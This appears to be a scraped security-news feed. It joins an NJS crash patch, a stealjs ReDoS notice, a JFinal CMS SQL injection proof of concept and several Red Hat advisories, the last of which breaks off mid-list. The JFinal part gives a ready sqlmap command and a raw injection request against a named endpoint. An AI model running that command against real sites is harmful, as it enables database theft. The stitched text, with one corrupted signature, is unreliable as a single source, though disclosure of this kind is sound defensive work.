Nginx NJS v0.7.7 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h

**Demo patch**

diff --git a/src/njs\_string.c b/src/njs\_string.c
index 83cede5..8b3a31e 100644
\--- a/src/njs\_string.c
+++ b/src/njs\_string.c
@@ -2307,7 +2307,10 @@ njs\_string\_prototype\_last\_index\_of(njs\_vm\_t \*vm, njs\_value\_t \*args,
         }
 
         p = njs\_string\_offset(string.start, end, index);
\-
+        if (p == (u\_char\*)NJS\_ERROR) {
+            njs\_error(vm, "index too large");
+            return NJS\_ERROR;
+        }
         for (; p >= string.start; p = njs\_utf8\_prev(p)) {
             if ((p + s.size) <= end && memcmp(p, s.start, s.size) == 0) {
                 goto done;
@@ -2530,14 +2533,16 @@ njs\_string\_offset(const u\_char \*start, const u\_char \*end, size\_t index)
 {
     uint32\_t    \*map;
     njs\_uint\_t  skip;
\-
+    njs\_uint\_t  size = 0;
     if (index >= NJS\_STRING\_MAP\_STRIDE) {
         map = njs\_string\_map\_start(end);
 
         if (map\[0\] == 0) {
\-            njs\_string\_offset\_map\_init(start, end - start);
+            size = njs\_string\_offset\_map\_init(start, end - start);
+        }
+        if((index / NJS\_STRING\_MAP\_STRIDE) > size){
+            return (u\_char\*)NJS\_ERROR;
         }
\-
         start += map\[index / NJS\_STRING\_MAP\_STRIDE - 1\];
     }
 
@@ -2596,7 +2601,7 @@ njs\_string\_index(njs\_string\_prop\_t \*string, uint32\_t offset)
 }
 
 
\-void
+njs\_uint\_t
 njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size)
 {
     size\_t        offset;
@@ -2622,6 +2627,8 @@ njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size)
         offset--;
 
     } while (p < end);
+
+    return n;
 }
 
 
diff --git a/src/njs\_string.h b/src/njs\_string.h
index 99f9d14..7e5eaab 100644
\--- a/src/njs\_string.h
+++ b/src/njs\_string.h
@@ -244,7 +244,7 @@ njs\_int\_t njs\_string\_slice(njs\_vm\_t \*vm, njs\_value\_t \*dst,
 const u\_char \*njs\_string\_offset(const u\_char \*start, const u\_char \*end,
     size\_t index);
 uint32\_t njs\_string\_index(njs\_string\_prop\_t \*string, uint32\_t offset);
\-void njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size);
+njs\_uint\_t njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size);
 double njs\_string\_to\_index(const njs\_value\_t \*value);
 const char \*njs\_string\_to\_c\_string(njs\_vm\_t \*vm, njs\_value\_t \*value);
 njs\_int\_t njs\_string\_encode\_uri(njs\_vm\_t \*vm, njs\_value\_t \*args,

This fix is not standard, I just provides an idea.

CVE-2022-38890: Another way to trigger SEGV in njs_utf8_next cause oob read · Issue #569 · nginx/njs

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.

CVE-2022-37262: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/system/config/list  --thread 8 --batch --smart  --random-agent --data "oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**PACKET**

    POST /jfinal_cms/system/config/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 131
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/system/config/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360,1659131581; Hm_lpvt_1040d081eea13b44d84a4af639640d51=1659131581
    Connection: close
    
    oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10

CVE-2022-37207: someEXP_of_jfinal_cms/sql10.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Red Hat Security Advisory 2022-6542-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Red Hat Security Advisory 2022-6542-01

Red Hat Security Advisory 2022-6527-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.11.0 RPMs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Virtualization 4.11.0 RPMs security and bug fix update  
Advisory ID:       RHSA-2022:6527-02  
Product:           cnv  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6527  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-27191  
====================================================================  
1. Summary:

Red Hat OpenShift Virtualization release 4.11.0 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

CNV 4.11 for RHEL 7 - x86_64  
CNV 4.11 for RHEL 8 - x86_64

3. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for  
Red Hat OpenShift Container Platform.

This advisory contains OpenShift Virtualization 4.11.0 RPMs.

Security Fix(es):

* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2051902 - 4.11.0 rpms  
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server

6. Package List:

CNV 4.11 for RHEL 7:

Source:  
kubevirt-4.11.0-643.el7.src.rpm

x86_64:  
kubevirt-virtctl-4.11.0-643.el7.x86_64.rpm  
kubevirt-virtctl-redistributable-4.11.0-643.el7.x86_64.rpm

CNV 4.11 for RHEL 8:

Source:  
kubevirt-4.11.0-643.el8.src.rpm

x86_64:  
kubevirt-virtctl-4.11.0-643.el8.x86_64.rpm  
kubevirt-virtctl-redistributable-4.11.0-643.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMkzNzjgjWX9erEAQgG4RAAk4MHNM7335XuHsojYC7QkxUaHTkdHiLN  
kziuszf4kXR14nWZVCAdisOrTPMpl9m99WGsVvYdmwGkbJLQws+eSNDjrz3n81x+  
sy+XJxKNKAUBejsbgoCeYDCUSe9M2ItUSkw6CNty3yEAgdAonC8RXOdiMly/0RzE  
OQpoA2sLENF+Bp8UUx82tv84uNae25cc3mx40qTtrJ6EFRBjB3V4H00yi4SAGcan  
Hf+ebQnpw3dfwRgQ3aRjD80Q5EMKPZeEF5CxfnJcMCKmuVt1tPEyQ/Zxgs9/rqQV  
Gn2IKn6+yA1uC5h+968yb8TrVJtctThstWmkEds7TAKxIMZVszRXi7uaUjG/w0FZ  
QPAjzm/zSIkl3v2J2Vz3k1/FXPpAMoqUvm7yFBft9AonfJkz3l5+HUydpxL/K6iO  
PuTK1oJeblZ80lA7TnrnFl4h8P81VWRhmuF1Gjw2cr1W21c2g+7In7YduXzxem60  
6RGuay+cjdWmorHIPQEGShE5s6XXMfgtqEUiudSNH0EpKOO7WN46egNUMdWNJOIi  
Lb9BsINQVJW9YzSICbFc0HyNHLWAkD5PIQhvRgC3amvczMUnhwD4Touteas7Caf4  
UEbPwIa2iFFiQ9B83kYwQEUVpNDfuOBhYsig8FtO3lO16o4NlIEbvPXhnG41kxFA  
TxAIVSVrto0=nuEE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6527-01

Red Hat Security Advisory 2022-6540-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: webkit2gtk3 security update  
Advisory ID:       RHSA-2022:6540-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6540  
Issue date:        2022-09-15  
CVE Names:         CVE-2022-32893  
====================================================================  
1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

The following packages have been upgraded to a later upstream version:  
webkit2gtk3 (2.36.7).

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to  
arbitrary code execution (CVE-2022-32893)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2121645 - CVE-2022-32893 webkitgtk: processing maliciously crafted web content may lead to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_6.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32893  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMk0dzjgjWX9erEAQgJiw/+LYAkLQ3B+egDz2T8gBO2HzEtHgA8L7TO  
aFWvgGSnt32NlsOLFg1R3FxvGRVurR5Vgx2QN4tvVi/iYIgGw1WTSCC2GaiamjoP  
AawahjPf08LboH3d96QHN7rumXeXLUcymQyG4p4BPnEOqYPaKKdmj5CPaGWM/o+l  
ECo8POkVp0mHb4HOCL8iudG5aKDmEB5OqHfQS0XmFU3392yazpD6Y1DwpIfCNAhb  
ptdcqHrycH+QFUdd3YmtQj567R5+q/DAKFN60KHdwT+JeiRwdV9k89cAoWIJA6Hh  
3ZxRuVbc108rySf/9tdZSjl7nw4IbLwcbScUwUHfHzjFfS3h7u+kkDLL10c4sfWf  
psc1mGVUXzLN6qBaWiY96bXOUOzX72LkC0LqhgDOfjBvaGzJjFwfydDgql/TPkSZ  
478+0r5JD6sFsboLugtqhXMLNpJtxYGBSMUA31Bjmf8jWGwKrzZCbxUMuQIHk7VG  
4M9gdZbu5wQw6fhksOlHGowoXEvc6UTB36eSLvZ76OK65yoXmpOXTFjIFfmDACkV  
M4GVQGpNglQWn/4jBXjebEeFC86baScn97NpCL41FK9AXlP7xBPaCN++DjAYDlbg  
NJf8tizErS4zMa1moMYL2DEac/nhLJDwtKaCvftcdRPrVnQZEZto7Chvf1FgNAJc  
+nurAiBV/zc=W4oO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6540-01

Red Hat Security Advisory 2022-6539-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.109 and .NET Runtime 6.0.9.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security and bugfix update  
Advisory ID:       RHSA-2022:6539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6539  
Issue date:        2022-09-15  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.109 and .NET Runtime  
6.0.9.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet6.0-6.0.109-1.el8_6.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-6.0.109-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-6.0.109-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-6.0.109-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMk1tzjgjWX9erEAQgw+g//amwE2QaQf5yW7EW8rt67JALUZTNashe0  
Mb7PqAALg2u0GD6ceXurkCkB3SoH40phFOZyAmgH3A60rSXLcsBvFGSp/dNjYY9y  
RYOyqRsU9QmCbCpv8/L4zL1RStoYEpnSpPUUGEXca9gdz5DZfOC2U9e9Dnn+pL4J  
cQYeELp6HnozVKTjGK8tPXw5WbLK2mgGVcDojJjf8JajykeJfXUCIR+RMQo/HNLZ  
vuW3TPzCY6gRs15mwY/96z/7Tvluk4/XIb2dT43YRpeBTvgl4f+QTRUsgTiIRJMI  
s6Q8LSC4BYE/e2KoUWoB7qATqxoghn/qrhaMs+FolQf0Q4c7ks4M6oEf9Du0oLuk  
AqCkXFKmzXxwxcMxMqxzALJFM3YagG+eaWp9IDh8R/TLNsSsleydf6SaWsl+N9zO  
IIm040FWCbgdwYQIp0WbQONbC8T6Uf7hmZKO1G6b3q6dTaGcNMRrvBirHyNpAXn5  
4J3rLPBj4yl9vkAe2pbPjhw5AftLk9Evr0HXaksS5pW9yGKVf6RvAbGTu+04+zut  
Gr9f/t3Bqr2McEzvvRAUgcHEyA2b+CtQiqm+dhbo8REVxdHT9tnF3EUgpbbdZa3z  
4yqS5t5t+SqjvfBbSbqiCxjdkLBpbGJsWRfKm8CBDS7Qc9q5kJOvE9HIbETAXFMl  
niuMj2fXmOA»Yx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6539-01

Red Hat Security Advisory 2022-6526-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.11.0 images: RHEL-8-CNV-4.11. Issues addressed include denial of service, memory leak, and out of bounds read vulnerabilities.

Red Hat Security Advisory 2022-6526-01

Red Hat Security Advisory 2022-6522-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 3.1.423 and .NET Runtime 3.1.29.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET Core 3.1 on RHEL 7 security and bugfix update  
Advisory ID:       RHSA-2022:6522-01  
Product:           .NET Core on Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6522  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux  
7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 3.1.423 and .NET Runtime  
3.1.29.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
